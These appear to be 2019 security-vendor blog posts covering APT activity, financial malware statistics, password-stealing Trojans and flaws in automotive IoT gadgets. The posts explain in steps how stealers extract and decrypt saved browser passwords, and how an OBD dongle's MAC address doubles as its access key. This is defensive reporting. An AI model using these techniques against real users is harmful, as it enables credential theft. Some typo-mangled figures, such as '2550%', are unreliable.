On a more political level, there were several news stories covering Iranian activity.

A group connected to the Iranian Revolutionary Guard has been blamed for a wave of cyber-attacks against UK national infrastructure, including the Post Office, local government networks, private companies and banks. Personal data of thousands of employees were stolen. It is believed that the same group was also responsible for the attack on the UK parliamentary network in 2017. The UK NCSC (National Cyber Security Centre) is providing assistance to affected organizations.

Microsoft recently obtained a court order in the US to seize control of 99 websites used by the Iranian hacking group APT35 (aka Phosphorus and Charming Kitten). The threat actor used spoofed websites, including those of Microsoft and Yahoo, to conduct cyberattacks against businesses, government agencies, journalists and activists who focus on Iran. The sinkholing of these sites will force the group to recreate part of its infrastructure.

The US Cybersecurity and Infrastructure Security Agency (CISA) has reported an increase in cyberattacks by Iranian actors or proxies, targeting US industries and government agencies using destructive wiper tools. The statement was posted on Twitter by CISA director, Chris Krebs.

Southeast Asia and Korean Peninsula

This quarter we detected a lot of Korean-related activity. However, for the rest of the Southeast Asian region there has not been that much activity, especially when compared to earlier periods.

Early in Q2, we identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code. It’s clear that Lazarus keeps updating its tools very quickly. Meanwhile, BlueNoroff, the Lazarus sub-group that typically targets financial institutions, targeted a bank in Central Asia and a crypto-currency business in China.

In a recent campaign, we observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT – a cloud service-based backdoor. ScarCruft is a highly skilled APT group, historically using geo-political issues to target the Korean Peninsula. We found several victims worldwide identified as companies and individuals with ties to North Korea, as well as a diplomatic agency. Interestingly, we observed that ScarCruft continues to adopt publicly available exploit code in its tools. We also found an interesting overlap in a Russian-based victim targeted both by ScarCruft and DarkHotel – not the first time that we have seen such an overlap.

ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal. This backdoor shares its features with a previous Mac OS variant, but the structure has changed and detection is now much harder. Researchers were unable to find the dropper associated with this sample, so they could not identify the initial compromise vector.

The US Department of Homeland Security (DHS) has reported Trojan variants, identified as HOPLIGHT, being used by the North Korean government. The report includes an analysis of nine malicious executable files. Seven of them are proxy applications that mask traffic between the malware and the remote operators. The proxies have the ability to generate fake TLS handshake sessions using valid public SSL certificates, disguising network connections with remote malicious actors. One file contains a public SSL certificate and the payload of the file appears to be encoded with a password or key. The remaining file does not contain any of the public SSL certificates, but attempts outbound connections and drops four files: the dropped files primarily contain IP addresses and SSL certificates.

In June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and Southeast Asia. The threat actor behind the campaign, which we believe to be the PLATINUM APT group, uses an elaborate, previously unseen, steganographic technique to conceal communication. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof: the actors used two interesting steganography techniques in this APT. It’s also interesting that the attackers decided to implement the utilities they need as one huge set – an example of the framework-based architecture that is becoming more and more popular.

Other interesting discoveries

On May 14, Microsoft released fixes for a critical Remote Code Execution vulnerability (CVE-2019-0708) in Remote Desktop Services (formerly known as Terminal Services) that affects some older versions of Windows: Windows 7, Windows Server 2008 R2, Windows Server 2008 and some unsupported versions of Windows – including Windows 2003 and Windows XP. Details on how to mitigate this vulnerability are available in our private report ‘Analysis and detection guidance for CVE-2019-0708’. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is ‘wormable’, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way that WannaCry spread. Microsoft has not observed exploitation of this vulnerability, but believes it is highly likely that malicious actors will write an exploit for it.

Early in June, researchers at Malwarebytes Labs observed a number of compromises on Amazon CloudFront, a Content Delivery Network (CDN), where hosted JavaScript libraries were tampered with and injected with web skimmers. Although attacks that involve CDNs usually affect a large number of web properties at once via their supply chain, this isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or link to code developed specifically for them and hosted on a custom AWS S3 bucket. Without properly validating externally loaded content, these sites are exposing their users to various threats, including some that pilfer credit card data. After analyzing these breaches, researchers found that they are a continuation of a campaign from Magecart threat actors attempting to cast a wide net around many different CDNs. CDNs are widely used because they provide great benefits to website owners, including optimizing load times and cost, as well as helping with all sorts of data analytics. The sites they identified had nothing in common other than the fact they were all using their own custom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN repository would be themselves.

Dragos has reported that XENOTIME, the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017, has expanded its focus beyond the oil and gas industries. Researchers have recently seen the group probing the networks of electric utility organizations in the US and elsewhere – perhaps as a precursor to a dangerous attack on critical infrastructure that could potentially cause physical damage or loss of life. Dragos first noticed the shift in targeting in late 2018; and the attacks have continued into 2019.

We recently reported on the latest versions of FinSpy for Android and iOS, developed in mid-2018. This surveillance software is sold to government and law enforcement organizations all over the world, who use it to collect a variety of private user information on various platforms. WikiLeaks first discovered the implants for desktop devices in 2011 and mobile implants were discovered in 2012. Since then Kaspersky has continuously monitored the development of this malware and the emergence of new versions in the wild. Mobile implants for iOS and Android have almost the same functionality. They are capable of collecting personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. It would seem that the iOS solution doesn’t provide infection exploits for its customers: the product seems to be fine-tuned to clean traces of publicly available jailbreaking tools. This might imply that physical access to the victim’s device is required in cases where devices are not already jailbroken. The latest version includes multiple features that we haven’t observed before. During our recent research, we detected up-to-date versions of these implants in the wild in almost 20 countries, but the size of the customer base would suggest that the real number of victims may be much higher.

Final thoughts

APT activity in the Middle East has been particularly interesting this quarter, not least because of the leaks related to alleged Iranian activity. This is especially interesting because one of those leaks might have been part of a disinformation campaign carried out with the help of the Sofacy/Hades threat actor.

In contrast to earlier periods, when Southeast Asia was the most active region for APTs, the activities we detected this quarter were mainly Korean-related. For the rest of the region, it was a much quieter quarter.

Across all regions, geo-politics remains the principal driver of APT activity.

It is also clear from our FinSpy research that there is a high demand for ‘commercial’ malware from governments and law enforcement agencies.

One of the most noteworthy aspects of the APT threat landscape we reported this quarter was our discovery of TajMahal, a previously unknown and technically sophisticated APT framework that has been in development for at least five years. This full-blown spying framework includes up to 80 malicious modules stored in its encrypted Virtual File System – one of the highest numbers of plugins we’ve ever seen for an APT toolset.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

2019. július 31.

Financial threats in H1 2019

Introduction and methodology

Financial cyberthreats are malicious programs that attack users of online banking services, electronic money, cryptocurrency and other similar services, as well as threats aimed at gaining access to financial organizations and their infrastructure. Kaspersky experts regularly analyze the statistics that the company’s products anonymously send to the cloud infrastructure of the Kaspersky Security Network (KSN) in case users agree to transfer such data. In order to study the threat landscape of the financial sector, the researchers analyzed cases of malicious activity on the devices of private users of Kaspersky’s security solutions. Statistics on corporate users were collected from corporate security solutions, after the customers agreed to share their data with Kaspersky. The information obtainedwas compared with data fromthe same period in 2018, to track the trends in the development of malware. users We looked at quarterly results in order to compare statisitics for PC users, as we were able to divide the data into two catergories – corporate and private users. Traditionally, the second and the third quarter might differ from the first and the fourth as these people often go on vaction and there less of corporate financial activity in these periods. The most active malware families were then analyzed.

Main findings:
  • In the first half of 2019, more than 430,000 unique users were attacked by financial threats – seven percent more than during the same period in 2018
  • The number of financial attacks in the first half of 2019 was 10,493,792 – 93% more than in the first and second quarter of 2018
  • The number of malware samples from financial threats received by Kaspersky in the first half of 2019 was 5,242,462 – 74% more than the previous year
  • The countries with the largest share of users attacked by financial malware were China and Belarus (2.3% each). In second and third place were Venezuela (2.2%) and South Korea (2.1%), respectively
  • During the first half of 2019, Kaspersky blocked more than 339,000 attempts to switch users to phishing pages pretending to be big banks
  • 438,709 unique users encountered mobile financial threats in the first half of 2019 – 23% less than in the same period in 2018
  • The number of mobile financial attacks in the first half of 2019 was 3,730,378 – 107% more than in the first half of 2018
Threats to PC: banking malware and phishing

In the first half of 2019, Kaspersky experts detected 431,088 unique users[1] attacked by banking Trojans aimed at stealing funds and financial data, which was a seven percent increase compared to the same period in 2018 (400,830).


The number of unique attacked users, Q1 2018 – Q2 2019


The number of unique attacked users by user type, Q1 2018-Q2 2019

At the same time, the share of users attacked through corporate devices in the first half of 2019 reached 30.9%, while in the first half of 2018, this figure was half as much (15.3%).

Researchers also noticed an increased number of malicious files in 2019. Thus, in the first quarter, the number of samples in the Kaspersky collection more than doubled, compared to the same period in 2018, reaching 335,000. But in the second quarter, growth slowed down.


Number of samples of new financial malware, Q1 2018 – Q2 2019

Attacks have also become more frequent: the number of attempts to infect a device detected by Kaspersky’s protective solutions in both the first and second quarter of 2019 exceeded the corresponding figures of 2018 by 51% and 27%, respectively.


The number of attempts to infect financial malware, Q1 2018 – Q2 2019

For a more complete analysis of the threat landscape, experts compiled a list of the most active banking Trojans in the first and second quarters of 2019, positioning them by the number of unique users that these threats attacked. 39.50% of corporate users were attacked by the RTM Trojan, one of the most common malware samples of the past year. In second place was Emotet (14.90%), capable of loading malware onto an infected device. For example, the Trickster Trojan, which can be installed on the victim’s computer, which is in third place in our ranking (12.30%).

Corporate users Private users Trojan-Banker.Win32.RTM 39.50% Trojan-Banker.Win32.Zbot 2550% Trojan-Banker.Win32.Emotet 14.90% Trojan-Banker.Win32.RTM 2450% Trojan-Banker.Win32.Trickster 12.30% Trojan-Banker.Win32.Emotet 640%

Top 3 types of financial malware found in the first half of 2019

This is different for private users: the above-mentioned RTM and Emotet occupy second and third places with 24.5% and 6.4%, respectively, and in the first place is Zbot – one of the most common Trojans of 2018. Such malware is usually spread with the help of email campaigns or through phishing sites. In the first half of 2019, Kaspersky prevented more than 339,000 attempts to switch users to phishing pages that were designed as legitimate pages of large banks.

Geography

The top 10 countries with the largest share of users attacked by financial malware do not have geopolitical similarities and are not situated in a specific region. In the first place were China and Belarus (2.3%), followed by Venezuela (2.2%) and South Korea (2.1%).

Country* %** China     2.30 Belorussia     2.30 Venezuela     2.20 South Korea     2.10 Serbia     1.80 Greece     1.70 Cameroon     1.60 Indonesia     1.50 Pakistan     1.50 Russia     1.40

* Countries where the number of users of Kaspersky’s security solutions is relatively small (less than 10,000) are excluded from the ranking.
** The share of unique users attacked in relation to all users of Kaspersky ‘s security solutions in the country.

Top 10 countries by the proportion of unique users attacked by financial malware

Threats to mobile platforms

In the first half of 2019, attackers actively used the names of the largest financial services and banking organizations to attack mobile platform users. Researchers found 438,709 unique users attacked by mobile Trojan bankers. For comparison, in the first half of 2018, the number of attacked users was 569,057, a decrease of 23%.


The number of users attacked by financial threats for mobile platforms, H1 2018 – H1 2019

Similar cases can be seen in the table representing the total number of attacks over this period.


The number of attacks of financial threats for mobile platforms, H1 2018 – H1 2019

The number of attacked users and detected attacks peaked rapidly in the second half of 2018. 1,333,410 users were attacked and and there were 10,256,935 attacks. The reason behind this is the rapid growth in activity of the Asacub banker trojan and an increase in the distribution of the Svpeng banker trojan. As it can be seen from Kaspersky’s records during this period, the number of Asacub attacks peaked in in the second half of 2018, multiplying almost a thousand times, comparing to figures of H1 2018. However, the epidemics then calmed in H1 2019.

H1 2018 h2 2018 h1 2019 Trojan-Banker.AndroidOS.Asacub.a 476 431036 69704 Trojan-Banker.AndroidOS.Asacub.snt 182 341726 92483 Trojan-Banker.AndroidOS.Asacub.ce 0 196479 34211 Trojan-Banker.AndroidOS.Asacub.ci 0 194564 3101 Trojan-Banker.AndroidOS.Asacub.cg 0 152011 2893 Trojan-Banker.AndroidOS.Svpeng.q 84268 126316 35400

The influence of Asacub on the overall statistics can be clearly seen in the graph below.


The number of users attacked by Asacub banking trojan, H1 2018 – H1 2019

The overall number of detected malicious files (installation packages) has decreased since the first half of 2018: in the first half of 2019, there were 43% fewer. At the same time, researchers recorded an increase in the number of attacks, rising by 107%.


Number of malicious files for mobile platforms, H1 2018 – H1 2019

The top-five malware families for mobile platforms in the first half of 2019 is almost identical to the overall rating for 2018.

More than half (51),39% of users faced representatives of the Asacub malware, which recorded powerful growth last year. At the peak of its “popularity” this malicious software attacked up to 40,000 users per day. isThe was partly due to the Trojan distribution method; when it reached the victim’s phone, it sent messages to all its contacts with links to download the installation file.

The Asacub family is followed by the Agent family (16.75%). This is the general verdict for banking trojans that cannot be classified into particular families or are represented by only one sample.

14.91% were attacked by the Svpeng Trojan. Like most banking Trojans, Svpeng slips a false login page to the user, and then intercepts the data entered in the login and password fields.

Family %* Trojan-Banker.AndroidOS.Asacub 51.39 Trojan-Banker.AndroidOS.Agent 16.75 Trojan-Banker.AndroidOS.Svpeng 14.91 Trojan-Banker.AndroidOS.Faketoken 7.56 Trojan-Banker.AndroidOS.Hqwar 2.56

* The share of users attacked by a certain family of malicious programs from all users attacked by financial threats

TOP 5 financial malware families, H1 2019

The Anubis Trojan is particularly interesting: it intercepts data for access to services of large financial organizations and two-factor authentication data (scode from SMS), which encrypts the data in order to extort money. It is one of the few banking Trojans that spreads via instant e messaging apps, such as WhatsApp, and sends a link to the victim’s contact list. Anubis is known to be one of the first threats in which comments on the YouTube platform were used as a command centre – a platform from which attackers manage malware. This usually works in the following way: malware writers create a video on Youtube and write a description or comment containing a command. Malware then connects to this video page, reads the description or comment and executes the command.

This happened in this way because Youtube is a public resource, so when one analyzes an infected user’s traffic, and sees a YouTube link in the list of accessed pages, even a cybersecurity expert may not consider it suspicious. They could even be unaware that those requests were not sent by the user but instead by malware. Moreover, such communication can not be blocked as there the user could be blocked from accessing the entire YouTube website.

Conclusion and recommendations

In the first half of 2019, researchers recorded an increase in the number of users attacked by financial malware for personal computers compared to the same period in 2018, and a decrease in the activity of cybercriminals targeting mobile platforms.

The main families of malware that attacked users in 2019 remained the same: for mobile platforms, the leaders turned out to be the Asacub family, and for PC RTM (for corporate users) and Zbot (for private users) trojans were the most prolific.

It was not possible to single out specific geographic locations where financial threats are most active, since they turned out to be approximately equal for users in all regions.

To protect against financial threats, Kaspersky recommends that users:
  • Install applications only from trusted sources – such as official stores;
  • Check what access rights and permissions the application requests – if they do not correspond to what the program is designed to do then it should be questioned;
  • Do not follow links in spam messages and do not open documents attached to them;
  • Use a reliable security solution, including on mobile devices.
To protect your business from financial malware, Kaspersky security specialists advise:
  • Introducing cybersecurity awareness training for your employees, particularly those who are responsible for accounting, to teach them how to distinguish phishing attacks: do not open attachments or click on links from unknown or suspicious addresses
  • Installing the latest updates and patches for all of the software you use
  • Forbidding the installation of programs from unknown sources
  • For endpoint level detection, investigation and timely remediation of incidents, implement an EDR solution such as Kaspersky Endpoint Detection and Response. It can even catch unknown banking malware
  • Integrating Threat Intelligence into your SIEM and security controls in order to access the most relevant and up-to-date threat data
2019. július 23.

How to steal a million (of your data)

Any user data — from passwords for entertainment services to electronic copies of documents — is highly prized by intruders. The reason is simply that almost any information can be monetized. For instance, stolen data can be used to transfer funds to cybercriminal accounts, order goods or services, and, if the desire or opportunity is lacking to do it oneself, it can always be sold on to other cybercrooks.

This thirst for stolen data is confirmed by the statistics: in the first half of 2019, more than 940,000 users were attacked by malware designed to harvest a variety of data on the computers. For comparison, in the same period of 2018, slightly less than 600,000 users of Kaspersky products were attacked. The threat’s called “Stealer Trojans” or Password Stealing Ware (PSW), a type of malware designed to steal passwords, files, and other data from victim computers.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geographical distribution of users attacked by Stealer Trojans, H1 2019 (download)

Over the past six months, we have detected such malware most often among users in Russia, Germany, India, Brazil, United States and Italy.

What’s being stolen?

Such stealers are commonly touted on malware seller/buyer forums. Each vendor advertises their product as the most effective and multifunctional, describing a wide spectrum of its capabilities.

Stealer Trojan seller announcement

Based on our analysis of this threat, an average stealer can:

  • Collect data from browsers:
    • Passwords
    • Autofill data
    • Payment cards
    • Cookies
  • Copy files:
    • All files from a specific directory (such as Desktop)
    • Files with a specific extension (TXT, DOCX)
    • Files for specific apps (cryptocurrency wallets, messenger session files)
  • Forward system data:
    • Operating system version
    • User name
    • IP address
    • And much more
  • Steal accounts from various applications (FTP clients, VPN, RDP, and others)
  • Take screenshots
  • Download files from the Internet

The most multifunctional specimens (for example, Azorult) take a complete “image” of the victim’s computer and data:

  • Full system information (list of installed programs, running processes, user/computer name, system version)
  • Hardware specification (video card, CPU, monitor)
  • Saved passwords, payment cards, cookies, browsing history for almost all known browsers (more than 30)
  • Passwords for mail/FTP/IM clients
  • Instant messenger files (Skype, Telegram)
  • Steam game client files
  • Files for more than 30 cryptocurrency programs
  • Screenshots
  • Files specified by “mask” (for example, the mask %USERPROFILE%\Desktop\ *.txt,*.jpg,*.png,*.zip,*.rar,*.doc means that all files with the specified extensions from the victim’s desktop are to be sent to the malware operator).

Let’s take a closer look at this last point. Why collect text files or, even more curiously, all files on the desktop? The fact is that files most needed by the user are commonly stored there. And among them may well be a text file containing frequently used passwords. Or, for example, work documents containing the confidential data of the victim’s employer.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geographical distribution of users attacked by Trojan-PSW.Win32.Azorult, H1 2019 (download)

The above-listed features helped turn Azorult into one of the most widely spread Stealer Trojans, detected on the computers of more than 25% of all users who encountered Trojan-PSW type malware.

After buying (or creating) the malware, the cybercriminals set about distributing it. Most often, this is done by sending emails with malicious attachments (for example, office docs with malicious macros that in turn download the Trojan). In addition, stealers can be distributed through botnets when the latter receive a command to download and run a particular Stealer Trojan.

How passwords get stolen from browsers

When it comes to stealing browser data (passwords, bank card details, autofill data), all stealers act in much the same way.

Google Chrome and Chromium-based browsers

In browsers based on the Chromium open source code, saved passwords are protected by DPAPI (Data Protection API). The browser’s own storage is used for this purpose, implemented as an SQLite database. Only the OS user who created the passwords can retrieve them from the database, and only on the computer on which they were encrypted. This is ensured by the particular encryption implementation, whereby the encryption key includes information about the computer and system user in a certain form. This data is not available to regular users outside the browser without special utilities.

But all this is no obstacle to a stealer that has already penetrated the computer, as it runs with the above-mentioned OS user rights; in this case, the process of extracting all saved data in the browser is as follows:

  1. Retrieval of the database file. Chromium-based browsers store this file at a standard and unchangeable path. In order to avoid problems with access (for example, if the browser happens to be using it), stealers can copy the file to another location or terminate all browser processes.
  2. Reading of encrypted data. As already mentioned, browsers use an SQLite database from which data can be read using standard tools.
  3. Decryption of data. As per the data protection principle described above, stealing the database file itself does not help get hold the data, since decryption must take place on the user’s computer. But that’s not a problem, because the decryption is performed directly on the victim’s computer through a call to the CryptUnprotectData function. The cybercriminals need no additional data — DPAPI does everything itself, since the call was made on behalf of the system user. As a result, the function returns passwords in “clean” readable form.

Code sample of Stealer Trojan Arkei (decryption of data obtained from a Chromium-based browser)

That’s it! Saved passwords, bank card details, and browsing history are all retrieved and ready to be sent to the cybercriminal server.

Firefox and browsers based on it

Password encryption in Firefox-based browsers is slightly different to that in Chromium, but for the stealer the process of obtaining them is just as simple.

In Firefox browsers, encryption uses Network Security Services — a set of libraries from Mozilla for the development of secure apps — and among others, the nss3.dll library.

As with Chromium-based browsers, retrieving data from the encrypted storage comes down to the same simple actions, but with some provisos:

  1. Retrieval of the database file. Firefox-derived browsers, unlike ones based on Chromium, generate a random user profile name that makes the location of the file with encrypted data unknowable beforehand. However, since the intruders know the path to the folders with user profiles, it is not difficult for them to sort through them to check for a file with a certain name (the name of the file with encrypted data for its part does not depend on the user and is always the same). Moreover, this data can remain even if the user deleted the browser, a fact exploited by some stealers (e.g. KPOT).
  2. Reading of encrypted data. The data can be stored either as in Chromium (in SQLite format), or in the form of a JSON file with fields containing encrypted data.
  3. Decryption of data. To decrypt the data, the stealer has to load the nss3.dll library, and then call several functions and get the decrypted data in readable form. Some stealers have functions for working directly with browser files, which allows them to be independent of this library and operate even if the browser has been uninstalled. However, it should be noted that if the data protection function is used with a master password, decryption without knowing (or bruteforcing) this password is impossible. Unfortunately, this feature is disabled by default, and enabling it requires a deep rummage in the settings menu.

Code sample of Stealer Trojan Orion (decryption of Firefox-based browser data)

Again that’s it! The data is ready to be forwarded to the cybercriminals.

Internet Explorer and Microsoft Edge

In Internet Explorer versions 4.x — 6.0, saved passwords and autofill data were stored in the so-called Protected Storage. To retrieve them (not only IE data, but also that of other apps using this storage), the stealer needed to load the pstorec.dll library and get all the data in open form by way of simple listing.

Internet Explorer 7 and 8 use a slightly different approach: The storage used is called Credential Store, and encryption is performed using a salt. Unfortunately, this salt is identical and well known, so the stealer can get all the saved passwords again by calling the same CryptUnprotectData function as above.

Internet Explorer 9 and Microsoft Edge use a new type of storage called Vault. However, it promises nothing new in terms of data acquisition: the stealer loads vaultcli.dll, calls several functions from it, and retrieves all the saved data.

So even a series of changes to the data storage method does not prevent data from being read by stealers.

Some facts Code borrowing/reuse

In analyzing specimens of new stealer families actively advertised by virus writers on specialized forums, we repeatedly came across code we had seen before in specimens of other families. This may be because some stealers have a common developer, who finished one project and used it as the basis for another one. For instance, the same person is behind Arkei and Nocturnal, as their sellers point out.

Comparison of Arkei and Nocturnal

Another reason for this similarity could be code borrowing. The Arkei source code was sold by its author on these same forums, and may have become the basis for another stealer, Vidar. These Trojans have much in common, from data harvesting techniques and the format of received commands to the structure of data sent to the C&C center.

Structure of data sent to the C&C center: Arkei and Vidar

Narrow expertise required

Despite the abundance of multifunctional stealers, Trojans designed to steal specific information enjoy a certain demand. For example, the malware Trojan-PSW.MSIL.Cordis is tasked solely with stealing data from sessions in Discord, an IM popular with gamers. The source code of this Trojan is extremely simple, and consists in searching for and sending a single file to the C&C center.

Cordis code sample

Such Trojans are often not sold, but presented in the form of source codes for anyone to compile; therefore they are relatively common.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geographical distribution of users attacked by Trojan-PSW.MSIL.Cordis, H1 2019 (download)

Using different programming languages

Although most known Stealer Trojans are written in the popular C/C++/C# languages, there are some specimens written in less common languages like Golang. One such Trojan is detected by Kaspersky products as Trojan-PSW.Win32.Gox. It can steal saved passwords, payment card details in Chromium-based browsers, cryptocurrency program files, and Telegram files.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geographical distribution of users attacked by Trojan-PSW.Win32.Gox, H1 2019 (download)

Conclusion

Users often entrust all critical data to the browser. After all, it’s convenient when passwords and bank card details are autofilled in the required fields. But we recommend against entrusting such vital information to browsers, since the methods of protection they use are no obstacle to malware.

The popularity of malicious programs hungry for browser data is showing no sign of slowing. Today’s crop of Stealer Trojans are actively supported, updated, and supplemented with new features (for example, the ability to steal 2FA data from apps that generate one-time access codes).

We recommend using special software for storing online account passwords and bank card details, or security solutions with appropriate technologies. Do not download or run suspicious files, do not follow links in suspicious emails, and generally observe all security precautions.

2019. július 22.

On the IoT road: perks, benefits and security of moving smartly

Kaspersky has repeatedly investigated security issues related to IoT technologies (for instance, here, or here). Earlier this year our experts have even gained foothold in the security of biomechanical prosthetic devices. The same implies to smart car security: our own research has indicated that there are number of issues—look here or here.

This year, we decided to continue our tradition of small-scale experiments with security of connected devices but focused on the automotive-related topic. The topic has retained its importance through the years, and as our own research into the subject has revealed, there are security issues in the market, since the vehicles are becoming smarter and more connected—and more exposed. But apart from that, there is a whole industry of aftermarket devices for the improvement of driving experience, from car scanners to various tuning gadgets. This angle was not examined separately, so we randomly took several different automotive connected devices and reviewed their security setup. Whilst it could hardly be called an investigation, this exercise allowed us to get a first look at security issues these suffer from.

We looked at the following devices: a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system, and a pressure and temperature monitoring system.

Scanning tool OBD dongle: secured exposure

The civil automotive diagnostics market is literally flooded with various wired and wireless, small and large devices that connect to the OBD2 diagnostic connector. They are basically sticks that are plugged into the vehicle and provide key driving dynamics data. Some of these devices are autonomous, and some depend on computers or mobile phones. They offer extensive recording and analysis options: the data includes engine speed, temperature, turbocharging, oil pressure, etc.

There are also applications that allow not only to read, but also to program the “brain” of the car, for example, to reset the “check engine” lightbulb. Use of these applications and making changes to vehicle operation through these can carry significant risks. In addition to the risk of damage to the car due to an operator error, there is a risk of an intruder intercepting control over the device. Of course, if the device is wired, then such risks are minimized, but if wireless—with the data from the diagnostic port transmitted via Bluetooth or WiFi—the risks of interception increase. Hence, there is an interest in how well the manufacturers of such devices have taken care of security.

The device that landed in our hands was developed by a German manufacturer and marketed under the brand of a well-known carmaker. For security reasons, we will not disclose the name.

The device is positioned as a racing logger that can record a video of the race on the track and superimpose over it telemetry data obtained from the car: speed, engine output, boost and so on.

The device works in conjunction with an iOS- or Android-powered smartphone connected via Bluetooth. All data is displayed on the screen of the smartphone. Ah, here we go. Since we decided to understand whether the use of this device carries any risk for the user, the Bluetooth connection is a good start.

Our initial analysis has shown that the device completely refused to work with the iPhone: the smartphone just could not see it. The problem may have been the firmware—this remained a mystery. Thus, all further experiments were carried out on an Android device.

In order to start working with the device, one needs to go through a pairing procedure. No passwords are required for this, anyone can pair anytime. This is a bad thing.

However, once the device is paired, the potential wrongdoer with his own device would need the serial number to connect the dongle on his own. The number is printed on the stick, so he would need physical access to it. Would he not?

In essence, that is it. The serial number has a format similar to “000780d9b826”. And if you write that as “00:07:80:d9:b8:26”, you get the MAC address of the Bluetooth adapter used in the dongle. So basically, you can find out the serial number while performing Bluetooth scanning in the vicinity of the working dongle. And here is the funny thing: this serial number / MAC address is the password to the dongle at the same time.

So, the dongle is broadcasting across the surrounding space and, as per the Bluetooth standard, disclosing its MAC address to the public, along with the access key. This means that virtually anyone can get access to the dongle by installing a simple Bluetooth scanner on a smartphone and finding a device with the name OBD STICK within the range. That’s all.

The bad news for the hacker is that the application itself does not allow controlling the car, only analyzing data from it. What if we set up a connection to the dongle from another application? We have tried this approach with a couple of other applications from Google Play.

According to the developers of the applications, there is quite a long list of functions that can mess with car drive dynamics data. We could not test this as, although the application connects to the dongle, it cannot read data from the CAN bus. The application is programmed to interact with OBD dongles via its specific protocol, while the examined device has its own, different protocol.

Dongles of this kind are normally built around the ELM327 chip, the most popular microcontroller in the market. Its main purpose is to process signals from the CAN bus and provide information to the consumer via an RS-232 interface, for example, a Bluetooth adapter—or USB adapter, if the connection is a wired one. The interface will transmit data to the smartphone via radio signal, and the phone will pass it on to the application. How to process the signals, receive these from the CAN bus or to transmit them there, in what form they are transmitted to the consumer—these are driven by the firmware, recorded into the ROM of the microcontroller in the factory. A completely different AT90CAN128-16MU microcontroller and a completely different firmware are used in the device being examined.

Thus, the reasonable question would be, whether it is possible to modify the firmware of the controller to add new capabilities. We found that there is an option to update dongle firmware in the application. Our research into the application code has revealed that:

  1. The application can download firmware from the developer’s website via an insecure HTTP connection.
  2. The firmware comes with the application itself.

All in all, we can get our hands on the firmware for further analysis and modification. So, do we finally have it? Unfortunately, not—the firmware is encrypted. This is no surprise and a smart move on the part of the vendor, since this protects the most delicate part of device operation: the data exchange protocol between the car and the dongle. Thus, there are only two ways to get the firmware: to request from the vendor or invest enormous effort into analyzing signals from the car. While this is doable, it if definitely is out of scope for our experiment.

To recap, we can say that, despite several minor insecurities, there is not much a malicious user can do with the device, all thanks to firmware encryption. Still, anyone can get access to the device and monitor the drive dynamics data. And it is also theoretically possible that a malicious user is persistent enough to get physical access to the firmware and reprogram it.

In order to make the device more secure, we would advise providing it with a unique access key and using that key for Bluetooth pairing. That way, the Bluetooth traffic will not be accessible to interception. And one recommendation for all who have already become a proud owner of this device: use it only on the race track and do not forget to pull the device from the OBD2 port after the race day.

Tire pressure and temperature monitoring system: a storm in a teacup

The other device we got our hands on was basically a toolset for monitoring tire pressure and temperature. It includes four sensors, installed directly in the car wheels, a screen located in the car interior, and a control unit. The sensors transmit radio signal to the unit, which passes the information to the screen. The latter displays the following:

  • the current tire pressure;
  • the temperature of the wheels.

The user can also toggle the unit of temperature between Celsius and Fahrenheit, choose from pounds per square inch (psi), Bar and Pascal for pressure display, and connect a new sensor when one breaks down. If the pressure drops to a critical point, the control unit emits a loud squeak. The same occurs when the pressure or the temperature in the wheel reach a high level. We decided to test whether it is possible to simulate a pressure drop or overheating of a wheel, thus forcing the driver to stop.

As mentioned, the sensors pass information to the control unit via radio signal on a frequency permitted for civil use. In order to intercept the radio signal, any RTL-SDR receiver that can be had for a couple of dollars will work. However, such devices are capable of reception only—they will not be able to transmit signal. To do this, one needs a complete SDR device, with both receiving and transmitting capability. We decided to use one for our security test.

When we turned the system on, it did not show any signs of activity, except for indicating an absence of connection with the sensors.

